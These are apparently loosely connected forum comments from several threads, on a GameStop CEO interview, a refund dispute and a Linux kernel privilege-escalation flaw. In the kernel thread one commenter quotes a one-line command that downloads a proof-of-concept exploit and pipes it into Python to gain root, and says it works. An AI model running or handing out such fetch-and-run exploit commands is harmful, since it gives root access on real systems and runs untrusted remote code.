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Heck, our current president is a fine example of this behavior, according to numerous accounts.

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And much more recently: Paramount Skydance / Warner Brothers.


Here's the GME CEO attempting to explain the deal https://x.com/i/status/2051303211668021478.

And "Attempting" is doing the heavy lifting here.


"Attempting" is not in any way a valid description of what he's doing there. That was a wild clip.


>assuming the CEO of GameStop doesn't mess it up completely.

This guy? https://x.com/i/status/2051303211668021478

Surely, he's a safe bet, no chance he will mess up this deal!

/s


I watched that interview live this AM and was so confused. The CEO looked annoyed and pissed the entire interview. Kept answering questions with “it’s on our website [awkward silence]”

It almost seemed like he was incredibly hung over and didn’t sleep last night.

But I got the feeling he was being a jerk on purpose. Still don’t understand why though.


The only guess I have, other than him being drunk, hungover, or high, is that he didn't want to admit or talk about GME dilution to fund the deal.


But then why do the interview at all? Bizarre.


And I don't understand why they can't just mold all the colors in parallel. If brown is in production, why can't they experiment with black at the same time?


It's refreshing to see something without any AI slop for once. The fact that this aspect is so exciting is so sad.


    modprobe algif_aead
    modprobe: FATAL: Module algif_aead not found in directory /lib/modules/6.14.3-x86_64-linode168
Yet this kernel is vulnerable.


That would suggest that CRYPTO_USER_API_AEAD=y in your kernel config. You can disable it in that case by setting that to "n", recompiling your kernel, and putting the new kernel in place.


Indeed, no modprobe.d will help when the feature is compiled into the kernel ("=y") instead of compiled into a runtime-loadable module.


    curl https://copy.fail/exp | python3 && su
    Traceback (most recent call last):
      File "<stdin>", line 9, in <module>
      File "<stdin>", line 5, in c
    AttributeError: module 'os' has no attribute 'splice'
Does this mean I'm not affected or it's a buggy script?

Edit: python3 is python 3.6 on my system. Runnung with python3.10 instantly roots. Crazy find!


It is trivial to re-write splice, just because the PoC uses it does not mean you're "not affected".


What is your Python version? Splice was added in 3.10.

https://docs.python.org/3/library/os.html#os.splice


Edited with an update.


do yourself a favor just pwn your laptop now with a sledgehammer and switch to an ipad or one of those big number phones for the elderly


They're issuing refunds and extra credits https://qht.co/item?id=47954655.


Days after denying that same refund and after a massive PR backlash.


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